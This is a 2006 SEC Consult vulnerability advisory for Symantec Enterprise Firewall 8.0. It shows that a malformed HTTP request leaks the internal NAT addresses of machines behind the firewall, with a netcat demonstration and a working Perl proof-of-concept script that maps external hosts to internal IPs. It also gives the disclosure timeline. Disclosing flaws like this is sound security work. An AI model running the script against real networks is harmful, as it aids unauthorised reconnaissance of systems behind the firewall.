SEC-20060512-0.txt

`SEC Consult Security Advisory 20060512-0  
==============================================================  
title: Symantec Enterprise Firewall NAT/HTTP  
Proxy Private IP Exposure  
program: Symantec Enterprise FW  
vulnerable version: 8.0  
homepage: www.symantec.com  
found: 2005-09-13  
by: SEC Consult / www.sec-consult.com  
==============================================================  
  
Vendor description:  
---------------  
  
Symantec's Enterprise Firewall provides complete network protection by  
integrating smart application-level proxies, network circuits and packet  
filtering into a special perimeter-security architecture (...)  
  
  
Vulnerabilty overview:  
---------------  
  
Enterprise FW leaks internal IPs of natted machines in response to  
certain HTTP requests.  
  
  
Vulnerability details:  
---------------  
  
A request of the form "get/XX HTTP/1.0" (note the missing space)  
triggers the exposure. The firewall seems to forward the request and to  
wait a certain time for a reply from the webserver, until the timeout is  
reaches. the final response from the firewall looks like:  
  
df0rm@b4byl0n:~> netcat www.behind-raptor.com 80  
get/01 http/1.0  
HTTP/1.1 504 Gateway Timeout  
MIME-Version: 1.0  
Server: Simple, Secure Web Server 1.1  
Date: Tue, 13 Sep 2005 06:23:32 GMT  
Connection: close  
Content-Type: text/html  
  
[...]  
  
The request seen by the firewall was:  
<tt><ul><li>  
http://10.238.94.57/01  
  
  
  
Here's a simple script to map external to internal IPs.  
  
---------------  
  
#!/usr/bin/perl  
# [title] raptor firewall internal IP disclosure 'exploit'  
# [mailto] research [at] sec-consult [dot} com  
#  
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com  
# waiting for timeout (this can take about 1 min.)  
# behind.raptor.com: 10.238.94.67  
  
use IO::Socket;  
  
$| = 1;  
  
$host = $ARGV[0] or die "$0 <host>\n";  
  
$request = "getXXX/XXX HTTP/1.0\n\n";  
  
my $sock = new IO::Socket::INET (  
PeerAddr => $host,  
PeerPort => 80,  
Proto => 'tcp',  
);  
  
die "could not open socket: $!\n" unless $sock;  
  
print $sock $request;  
  
print "waiting for timeout (this can take about 1 min.)\n";  
  
while (<$sock>) {  
if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {  
$ip = $1;  
}  
}  
  
if (defined($ip)) {  
print "$host: $ip\n";  
} else {  
print "failed.\n";  
}  
  
close($sock);  
  
  
vendor status:  
---------------  
vendor notified: 2005-09-13  
vendor response: 2005-09-13  
patch available: 2005-12  
  
  
General remarks  
---------------  
We would like to apologize in advance for potential nonconformities  
and/or known issues.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Blindengasse 3  
A-1080 Wien  
Austria  
  
Tel.: +43 / 1 / 409 0307 - 570  
Fax.: +43 / 1 / 409 0307 - 590  
Mail: office at sec-consult dot com  
www.sec-consult.com  
  
EOF SEC Consult / @2006  
research at sec-consult dot com  
`